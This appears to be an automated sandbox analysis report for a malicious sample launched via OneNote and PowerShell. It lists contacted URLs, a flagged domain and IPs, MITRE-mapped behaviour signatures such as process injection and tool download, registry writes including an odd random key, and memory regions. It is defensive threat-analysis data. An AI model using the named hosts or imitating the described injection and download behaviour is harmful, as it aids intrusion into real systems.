https://clients.config.office.net/user/v1.0/android/policies

unknown

https://www.cisco.com/c/en/us/solutions/enterprise/design-zone/index.html

unknown

https://aka.ms/pscore6

unknown

https://entitlement.diagnostics.office.com

unknown

https://www.cisco.com/c/tr_tr/index.html

unknown

https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json

unknown

https://outlook.office.com/

unknown

https://www.cisco.com/c/no_no/index.html

unknown

https://storage.live.com/clientlogs/uploadlocation

unknown

https://twitter.com/Cisco/

unknown

https://www.cisco.com/c/ar_eg/index.html

unknown

https://substrate.office.com/search/api/v1/SearchHistory

unknown

https://www.cisco.com/c/ko_kr/index.html

unknown

https://www.cisco.com/c/ro_ro/index.html

unknown

https://www.cisco.com/c/es_co/index.html

unknown

https://www.cisco.com/c/en/us/about/legal/terms-conditions.html

unknown

https://www.cisco.com/c/en/us/buy.html

unknown

https://clients.config.office.net/c2r/v1.0/InteractiveInstallation

unknown

https://www.cisco.com/c/uk_ua/index.html

unknown

https://graph.windows.net/

unknown

https://devnull.onenote.com

unknown

https://messaging.office.com/

unknown

https://www.cisco.com/c/fr_fr/index.html

unknown

https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing

unknown

https://skyapi.live.net/Activity/

unknown

https://www.cisco.com/c/en/us/training-events/training-certifications.html

unknown

https://www.cisco.com/web/fw/i/logo-open-graph.gif

unknown

https://api.cortana.ai

unknown

https://www.cisco.com/c/en_za/index.html

unknown

https://pdx-col.eum-appdynamics.com

unknown

https://messaging.action.office.com/setcampaignaction

unknown

https://visio.uservoice.com/forums/368202-visio-on-devices

unknown

https://staging.cortana.ai

unknown

https://onedrive.live.com/embed?

unknown

https://augloop.office.com

unknown

https://www.cisco.com/c/vi_vn/index.html

unknown

http://cdn.appdynamics.com

unknown

There are 90 hidden URLs, click here to show them.

Domains

Name

Malicious

starcomputadoras.com

144.217.139.27

Details

Name:	starcomputadoras.com
IP:	144.217.139.27
TargetID:	-1
Active:	true

Signature Hits	Behavior Group	Mitre Attack
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
Uses a known web browser user agent for HTTP communication	Networking	Application Layer Protocol
Downloads files from webservers via HTTP	Networking	Application Layer Protocol Non-Application Layer Protocol Ingress Tool Transfer
Performs DNS lookups	Networking	Application Layer Protocol Non-Application Layer Protocol
Spawns processes	System Summary	Process Injection
URLs found in memory or binary data	Networking
Uses secure TLS version for HTTPS connections	Compliance, Networking

cisco.com

72.163.4.185

Details

Name:	cisco.com
IP:	72.163.4.185
TargetID:	-1
Active:	true
Reputation:	high

Signature Hits	Behavior Group	Mitre Attack
Uses a known web browser user agent for HTTP communication	Networking	Application Layer Protocol
Downloads files from webservers via HTTP	Networking	Application Layer Protocol Non-Application Layer Protocol Ingress Tool Transfer
URLs found in memory or binary data	Networking
Uses secure TLS version for HTTPS connections	Compliance, Networking

www.cisco.com

unknown

IPs

Domain

Country

Malicious

144.217.139.27

starcomputadoras.com

Canada

Details

IP:	144.217.139.27
TargetID:	12
Current Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Country:	Canada
Countrycode:	CAN
ASN number:	16276
ASN name:	OVHFR
Private:	false
Domain:	starcomputadoras.com

Signature Hits	Behavior Group	Mitre Attack
Uses secure TLS version for HTTPS connections	Compliance, Networking

92.177.204.2

unknown

France

Details

IP:	92.177.204.2
TargetID:	15
Current Path:	C:\Windows\SysWOW64\backgroundTaskHost.exe
Country:	France
Countrycode:	FRA
ASN number:	12479
ASN name:	UNI2-ASES
Private:	false

Signature Hits	Behavior Group	Mitre Attack
Detected TCP or UDP traffic on non-standard ports	Networking	Non-Standard Port
Connects to IPs without corresponding DNS lookups	Networking

192.168.11.1

unknown

72.163.4.185

cisco.com

United States

Details

IP:	72.163.4.185
TargetID:	15
Current Path:	C:\Windows\SysWOW64\backgroundTaskHost.exe
Country:	United States
Countrycode:	USA
ASN number:	109
ASN name:	CISCOSYSTEMSUS
Private:	false
Domain:	cisco.com

Signature Hits	Behavior Group	Mitre Attack
Uses secure TLS version for HTTPS connections	Compliance, Networking

Registry

Path

Value

Malicious

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\ClientTelemetry\Sampling

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\CrashPersistence\ONENOTE\2776

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\OneNote\Resiliency\StartupItems

:'f

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\Experiment\onenote

Language

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\Experiment\onenote

EcsRequestPending

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\Experiment\onenote

SubscriptionCustomerLicenseInfo

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Word\Addins\OneNote.WordAddinTakeNotesButton

CommandLineSafe

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Word\Addins\OneNote.WordAddinTakeNotesButton

Description

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Word\Addins\OneNote.WordAddinTakeNotesButton

FriendlyName

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Word\Addins\OneNote.WordAddinTakeNotesButton

LoadBehavior

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\PowerPoint\Addins\OneNote.PowerPointAddinTakeNotesButton

CommandLineSafe

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\PowerPoint\Addins\OneNote.PowerPointAddinTakeNotesButton

Description

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\PowerPoint\Addins\OneNote.PowerPointAddinTakeNotesButton

FriendlyName

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\PowerPoint\Addins\OneNote.PowerPointAddinTakeNotesButton

LoadBehavior

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\OneNote\General

LastMyDocumentsPathUsed

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\TypeLib\{F2A7EE29-8BF6-4a6d-83F1-098E366C709C}\1.0\0\win64

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\TypeLib\{0EA692EE-BB50-4E3C-AEF0-356D91732725}\1.1\0\win64

NULL

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\OneNote\General

ProgressWindowPosLeft

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\OneNote\General

ProgressWindowPosTop

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\OneNote\General

ConsecutiveBootCrashes

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\OneNote\General

ConsecutiveEarlyCrashes

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\OneNote\General

EDPLastRevokeCheckTime

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\OneNote

FlightedVersion

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\OneNote\Options\Save

BackupFilenamePostfixStartSP1

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\OneNote\Options\Save

BackupFilenamePostfixEndSP1

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\OneNote\Options\Save

BackupFilenamePostfixEndRerepairSP1

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\OneNote

FirstBootStatus

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\OneNote\OpenNotebooks

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\OneNote\Resiliency

RepairQuickNotesOnBoot

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\OneNote\General

DateLastAttemptedOpeningLocalNotebooksOnBoot

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\ClientTelemetry\RulesLastAudienceReported

onenote.exe

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\FavoritePens

Data

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\OneNote\Page Sync Status

PageSyncStatusPersistentData

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\OneNote\Page Sync Status

PageSyncStatusPersistentDataLastUpdateDate

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\Experiment\onenote

BuildNumber

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\onenote

Expires

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\OneNote\General

LastCacheFclRepairSuccessTime

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\onenote\ConfigContextData

ChunkCount

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\onenote\ConfigContextData

1.1

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\onenote\ConfigContextData

1.2

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\onenote\ConfigContextData

1.3

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\onenote\ConfigContextData

1.4

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\onenote\ConfigContextData

1.5

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\onenote\ConfigContextData

1.6

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\onenote\ConfigContextData

1.7

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\onenote\ConfigContextData

1.8

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\onenote\ConfigContextData

1.9

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\onenote\ConfigContextData

1.10

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\onenote\ConfigContextData

1.11

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\onenote\ConfigContextData

1.12

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\onenote\ConfigContextData

1.13

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\onenote\ConfigContextData

1.14

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\onenote\ConfigContextData

1.15

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\onenote\ConfigContextData

VersionId

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\onenote

ETag

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\onenote

DeferredConfigs

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\onenote

ConfigIds

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\OneNote\RecentNotebooks

FOLDERID_Desktop

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\OneNote\RecentNotebooks

FOLDERID_Documents

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\OneNote\Place MRU

FOLDERID_Desktop

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\OneNote\Place MRU

FOLDERID_Documents

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\OneNote\Options\Paths

UnfiledNotesSection

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\OneNote\General

LastAppliedNotebookColor

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\Roaming

RoamingLastSyncTimeOneNote

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\Roaming

RoamingLastWriteTimeOneNote

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified

onenote.exe_queried

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified

onenote.exe

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\onenote.exe

RulesEndpoint

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\onenote.exe\ETWMonitor\{F562BB8E-422D-4B5C-B20E-90D710F7D11C}

Categories

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\onenote.exe\ETWMonitor\{02FD33DF-F746-4A10-93A0-2BC6273BC8E4}

Categories

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\onenote.exe\ULSMonitor

ULSTagIds0

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\onenote.exe\ULSMonitor

ULSTagIds1

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\onenote.exe\ULSMonitor

ULSCategoriesSeverities

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\onenote.exe\ULSMonitor

ULSAllCategories

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\OneNote\General

LastNotebookSyncTypeLogTime

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\ClientTelemetry\Volatile

MsaDevice

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\000061091A0090400100000000F01FEC\Usage

OneNoteNonBootFilesIntl_1033

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\onenote.exe\ETWMonitor\{F562BB8E-422D-4B5C-B20E-90D710F7D11C}

Categories

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\onenote.exe\ETWMonitor\{02FD33DF-F746-4A10-93A0-2BC6273BC8E4}

Categories

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\onenote.exe\ULSMonitor

ULSTagIds0

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\onenote.exe\ULSMonitor

ULSTagIds1

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\onenote.exe\ULSMonitor

ULSCategoriesSeverities

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\onenote.exe\ULSMonitor

ULSAllCategories

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\OneNote\Options\Save

BackupSharePointNotebooks

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F10090400100000000F01FEC\Usage

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F10090400100000000F01FEC\Usage

OCR_1033

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages

en-GB

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages

en-US

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages

en-GB

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages

en-US

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common

SessionId

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\CrashPersistence\ONENOTE\2776

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\Licensing\LicensingNext

homebusiness2019retail

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\TypeLib\{F2A7EE29-8BF6-4a6d-83F1-098E366C709C}\1.0

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\TypeLib\{F2A7EE29-8BF6-4a6d-83F1-098E366C709C}\1.0\0\win64

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\TypeLib\{0EA692EE-BB50-4E3C-AEF0-356D91732725}\1.1

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\TypeLib\{0EA692EE-BB50-4E3C-AEF0-356D91732725}\1.1\0\win64

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Interface\{E2E1511D-502D-4BD0-8B3A-8A89A05CDCAE}\ProxyStubClsid32

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\Interface\{E2E1511D-502D-4BD0-8B3A-8A89A05CDCAE}\ProxyStubClsid32

NULL

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\OneNote

FirstBootStatus

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\OneNote

FirstBootStatus

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\Internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--syslcid=2057&build=16.0.14326&crev=3\0

FilePath

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\Internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--syslcid=2057&build=16.0.14326&crev=3\0

StartDate

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\Internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--syslcid=2057&build=16.0.14326&crev=3\0

EndDate

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\Roaming

RoamingConfigurableSettings

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\onenote\ConfigContextData

ChunkCount

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\onenote\ConfigContextData

ChunkCount

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\onenote\ConfigContextData

ChunkCount

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\onenote\ConfigContextData

ChunkCount

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\onenote\ConfigContextData

ChunkCount

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\onenote\ConfigContextData

ChunkCount

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\onenote\ConfigContextData

ChunkCount

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\onenote\ConfigContextData

ChunkCount

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\onenote\ConfigContextData

ChunkCount

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\onenote\ConfigContextData

ChunkCount

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\onenote\ConfigContextData

ChunkCount

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\onenote\ConfigContextData

ChunkCount

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\onenote\ConfigContextData

ChunkCount

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\onenote\ConfigContextData

ChunkCount

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\onenote\ConfigContextData

ChunkCount

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\onenote

Expires

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\CrashPersistence\ONENOTE\2776

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\OneNote

FirstBootStatus

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\Licensing

NextUserLicensingLicenseIds

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\Internet\WebServiceCache

LastClean

HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Immersive\production\Property

0018400A8D8FFF7A

HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Immersive\production\Token\{2B379600-B42B-4FE9-A59C-A312FB934935}

DeviceTicket

HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Immersive\production\Token\{2B379600-B42B-4FE9-A59C-A312FB934935}

DeviceId

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\OneNote\General

LastAppliedNotebookColor

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\OneNote\General

LastAppliedNotebookColor

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\000061091A0090400100000000F01FEC\Usage

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\000061091A0090400100000000F01FEC\Usage

OneNoteFilesIntl_1033

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F00000000100000000F01FEC\Usage

OneNoteFiles

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32

EnableFileTracing

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32

EnableAutoFileTracing

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32

EnableConsoleTracing

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32

FileTracingMask

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32

ConsoleTracingMask

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32

MaxFileSize

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32

FileDirectory

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS

EnableFileTracing

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS

EnableAutoFileTracing

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS

EnableConsoleTracing

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS

FileTracingMask

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS

ConsoleTracingMask

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS

MaxFileSize

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS

FileDirectory

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Itotvjwju

2a00e730

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Itotvjwju

1f9f377e

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Itotvjwju

1dde1702

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Itotvjwju

a5627067

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Itotvjwju

d86a3fed

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Itotvjwju

60d65888

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Itotvjwju

a723501b

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Itotvjwju

554988c6

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Itotvjwju

2a00e730

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Itotvjwju

2a00e730

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Itotvjwju

2a00e730

There are 154 hidden registries, click here to show them.

Memdumps

Base Address

Regiontype

Protect

Malicious

2FAA000

heap

page read and write

1A0DD740000

remote allocation

page read and write

33A5000

heap

page read and write

7FF800FEA000

trusted library allocation

page read and write

2F40000

heap

page read and write

46BB000

heap

page read and write

1A0DD910000

heap

page read and write

1D651F25000

heap

page read and write

7BA9C7F000

stack

page read and write

5E51000

heap

page read and write

1D651D67000

heap

page read and write

46D9000

heap

page read and write

3370000

heap

page read and write

1A0DE076000

heap

page read and write

1A0DD96B000

heap

page read and write

46BB000

heap

page read and write

46BB000

heap

page read and write

1F14CE000

stack

page read and write

1A0DCE82000

heap

page read and write

46BB000

heap

page read and write

360000

heap

page read and write

46BB000

heap

page read and write

964000

heap

page read and write

46DE000

heap

page read and write

46F5000

heap

page read and write

2A40000

heap

page read and write

1A0DD90E000

heap

page read and write

1F0279000

stack

page read and write

860000

heap

page read and write

7BA9D7B000

stack

page read and write

5662000

heap

page read and write

1D66BE0B000

heap

page read and write

46BB000

heap

page read and write

1F053E000

stack

page read and write

3660000

heap

page read and write

1D66BEB0000

heap

page read and write

1F03B8000

stack

page read and write

2FA0000

heap

page read and write

A7C000

stack

page read and write

46BB000

heap

page read and write

1A0DE096000

heap

page read and write

46BB000

heap

page read and write

1F07BD000

stack

page read and write

1EFBD2000

stack

page read and write

7FF800F16000

trusted library allocation

page execute and read and write

1A0DD95B000

heap

page read and write

4F30000

trusted library allocation

page read and write

1A0DD97D000

heap

page read and write

D1E000

stack

page read and write

1A0DCE85000

heap

page read and write

1A0DCF13000

heap

page read and write

46BB000

heap

page read and write

1F0439000

stack

page read and write

1D653EC8000

trusted library allocation

page read and write

46BB000

heap

page read and write

1A0DD96B000

heap

page read and write

940000

unclassified section

page readonly

1A0DCF3B000

heap

page read and write

89E000

stack

page read and write

2DDE000

stack

page read and write

1A0DD929000

heap

page read and write

31E0000

heap

page read and write

7FF800FD0000

trusted library allocation

page read and write

682B000

heap

page read and write

46BB000

heap

page read and write

1F05BE000

stack

page read and write

317C000

heap

page read and write

46BB000

heap

page read and write

4651000

heap

page read and write

7FF800E33000

trusted library allocation

page execute and read and write

2E60000

heap

page read and write

1D653990000

trusted library allocation

page read and write

250D000

stack

page read and write

3146000

heap

page read and write

2490000

unclassified section

page readonly

4F30000

trusted library allocation

page read and write

2C99000

heap

page read and write

2B68000

heap

page read and write

E0F000

heap

page read and write

1A0DD932000

heap

page read and write

4F84000

heap

page read and write

1A0DCD70000

heap

page read and write

1D653790000

heap

page read and write

1D651D53000

heap

page read and write

46BB000

heap

page read and write

1A0DD96D000

heap

page read and write

DDF000

stack

page read and write

3146000

heap

page read and write

46BB000

heap

page read and write

1A0DCF02000

heap

page read and write

3170000

heap

page read and write

1D651D1F000

heap

page read and write

1D66BE03000

heap

page read and write

6BD000

stack

page read and write

46BB000

heap

page read and write

C9E000

stack

page read and write

46BB000

heap

page read and write

46BB000

heap

page read and write

1D66BE15000

heap

page read and write

2EA0000

heap

page read and write

1A0DD940000

heap

page read and write

C3D000

stack

page read and write

46BB000

heap

page read and write

1A0DD92F000

heap

page read and write

46BB000

heap

page read and write

1D653C08000

trusted library allocation

page read and write

7029000

heap

page read and write

2530000

unclassified section

page readonly

7FF801120000

trusted library allocation

page read and write

7BA970B000

stack

page read and write

46BB000

heap

page read and write

964000

heap

page read and write

46BB000

heap

page read and write

E0F000

heap

page read and write

33B0000

heap

page read and write

1D651CCE000

heap

page read and write

7D0000

heap

page read and write

740000

heap

page read and write

90F108C000

stack

page read and write

46BB000

heap

page read and write

25E0000

unclassified section

page readonly

1D653870000

heap

page read and write

1A0DCE00000

heap

page read and write

1F083D000

stack

page read and write

305D000

stack

page read and write

3090000

heap

page read and write

2580000

unclassified section

page readonly

1A0DCE71000

heap

page read and write

7FF800EE6000

trusted library allocation

page read and write

46DE000

heap

page read and write

740000

heap

page read and write

346F000

stack

page read and write

3050000

heap

page read and write

1A0DD978000

heap

page read and write

4A81000

heap

page read and write

46BB000

heap

page read and write

46D9000

heap

page read and write

4A1F000

heap

page read and write

E10000

heap

page read and write

46BB000

heap

page read and write

3B0E000

stack

page read and write

46BB000

heap

page read and write

1A0DD95C000

heap

page read and write

1D651F10000

trusted library allocation

page read and write

